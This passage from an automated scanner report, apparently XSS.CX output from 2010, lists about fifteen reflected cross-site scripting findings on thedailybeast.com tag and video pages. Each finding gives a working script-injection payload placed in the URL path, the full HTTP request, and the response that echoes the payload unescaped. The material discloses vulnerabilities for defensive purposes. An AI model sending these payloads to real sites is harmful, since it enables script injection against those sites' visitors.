Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:00:15 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58554

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/tagf37aa"><script>alert(1)</script>f06f94f8a9f/glee/"/>
...[SNIP]...

1.93. http://www.thedailybeast.com/tag/gossip+girl/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /tag/gossip+girl/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d790e"><script>alert(1)</script>8236cf48970 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tagd790e"><script>alert(1)</script>8236cf48970/gossip+girl/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:02:05 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58575

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/tagd790e"><script>alert(1)</script>8236cf48970/gossip+girl/"/>
...[SNIP]...

1.94. http://www.thedailybeast.com/tag/gwyneth+paltrow/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /tag/gwyneth+paltrow/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b4fa"><script>alert(1)</script>391a4816353 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag3b4fa"><script>alert(1)</script>391a4816353/gwyneth+paltrow/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:00:31 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58587

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/tag3b4fa"><script>alert(1)</script>391a4816353/gwyneth+paltrow/"/>
...[SNIP]...

1.95. http://www.thedailybeast.com/tag/jim+carrey/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /tag/jim+carrey/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a77fb"><script>alert(1)</script>752196addb8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /taga77fb"><script>alert(1)</script>752196addb8/jim+carrey/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:01:12 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58572

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/taga77fb"><script>alert(1)</script>752196addb8/jim+carrey/"/>
...[SNIP]...

1.96. http://www.thedailybeast.com/tag/jimmy+mcmillan/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /tag/jimmy+mcmillan/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72a51"><script>alert(1)</script>d301b22a1d2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag72a51"><script>alert(1)</script>d301b22a1d2/jimmy+mcmillan/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 15:59:13 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58584

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/tag72a51"><script>alert(1)</script>d301b22a1d2/jimmy+mcmillan/"/>
...[SNIP]...

1.97. http://www.thedailybeast.com/tag/jon+hamm/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /tag/jon+hamm/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ccefe"><script>alert(1)</script>b4603a97595 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tagccefe"><script>alert(1)</script>b4603a97595/jon+hamm/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:00:57 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58566

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/tagccefe"><script>alert(1)</script>b4603a97595/jon+hamm/"/>
...[SNIP]...

1.98. http://www.thedailybeast.com/tag/judah+friedlander/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /tag/judah+friedlander/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81368"><script>alert(1)</script>22d3af8d9f8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag81368"><script>alert(1)</script>22d3af8d9f8/judah+friedlander/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 15:59:42 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58593

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/tag81368"><script>alert(1)</script>22d3af8d9f8/judah+friedlander/"/>
...[SNIP]...

1.99. http://www.thedailybeast.com/tag/keith+olbermann/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /tag/keith+olbermann/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65eb8"><script>alert(1)</script>f671c4114a1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag65eb8"><script>alert(1)</script>f671c4114a1/keith+olbermann/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:02:07 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58587

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/tag65eb8"><script>alert(1)</script>f671c4114a1/keith+olbermann/"/>
...[SNIP]...

1.100. http://www.thedailybeast.com/tag/michelle+obama/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /tag/michelle+obama/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c6cf"><script>alert(1)</script>31f0e927e36 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag2c6cf"><script>alert(1)</script>31f0e927e36/michelle+obama/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:02:15 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58584

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/tag2c6cf"><script>alert(1)</script>31f0e927e36/michelle+obama/"/>
...[SNIP]...

1.101. http://www.thedailybeast.com/tag/ok+go/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /tag/ok+go/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a580"><script>alert(1)</script>41a1b2ea052 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag9a580"><script>alert(1)</script>41a1b2ea052/ok+go/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 15:59:58 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58557

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/tag9a580"><script>alert(1)</script>41a1b2ea052/ok+go/"/>
...[SNIP]...

1.102. http://www.thedailybeast.com/tag/simpsons/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /tag/simpsons/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa652"><script>alert(1)</script>492cd647d95 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tagaa652"><script>alert(1)</script>492cd647d95/simpsons/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:01:28 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58566

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/tagaa652"><script>alert(1)</script>492cd647d95/simpsons/"/>
...[SNIP]...

1.103. http://www.thedailybeast.com/tag/tina+fey/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /tag/tina+fey/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3c6d"><script>alert(1)</script>2eed66a7b19 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tage3c6d"><script>alert(1)</script>2eed66a7b19/tina+fey/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:02:15 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58566

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/tage3c6d"><script>alert(1)</script>2eed66a7b19/tina+fey/"/>
...[SNIP]...

1.104. http://www.thedailybeast.com/tag/twilight/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /tag/twilight/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b60a9"><script>alert(1)</script>677c069ff60 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tagb60a9"><script>alert(1)</script>677c069ff60/twilight/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:01:43 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58566

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/tagb60a9"><script>alert(1)</script>677c069ff60/twilight/"/>
...[SNIP]...

1.105. http://www.thedailybeast.com/tag/wheel+of+fortune/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /tag/wheel+of+fortune/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1595"><script>alert(1)</script>c71768ff6a0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /taga1595"><script>alert(1)</script>c71768ff6a0/wheel+of+fortune/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 15:59:49 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58590

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/taga1595"><script>alert(1)</script>c71768ff6a0/wheel+of+fortune/"/>
...[SNIP]...

1.106. http://www.thedailybeast.com/tag/zach+galifianakis/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /tag/zach+galifianakis/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c054"><script>alert(1)</script>9f44b4a24d0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag3c054"><script>alert(1)</script>9f44b4a24d0/zach+galifianakis/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:00:04 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58593

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/tag3c054"><script>alert(1)</script>9f44b4a24d0/zach+galifianakis/"/>
...[SNIP]...

1.107. http://www.thedailybeast.com/video/ [REST URL parameter 1]  previous

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /video/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e84b0"><script>alert(1)</script>2ad767cd6ed was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /videoe84b0"><script>alert(1)</script>2ad767cd6ed/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __unam=c84b8fc-12c473cf84c-7e5976b8-6; __utmz=157974911.1289685366.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|266F5AAA851D3203-40000140601D0BF5[CE]; s_sq=%5B%5BB%5D%5D; __utma=157974911.245470979.1289685366.1289685366.1289685549.2; __utmc=157974911; __qca=P0-1101498677-1289685372894; __utmb=157974911.1.10.1289685549;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:06:56 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58545

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/videoe84b0"><script>alert(1)</script>2ad767cd6ed/"/>
...[SNIP]...

Report generated by XSS.CX at Sat Nov 13 20:05:53 CST 2010.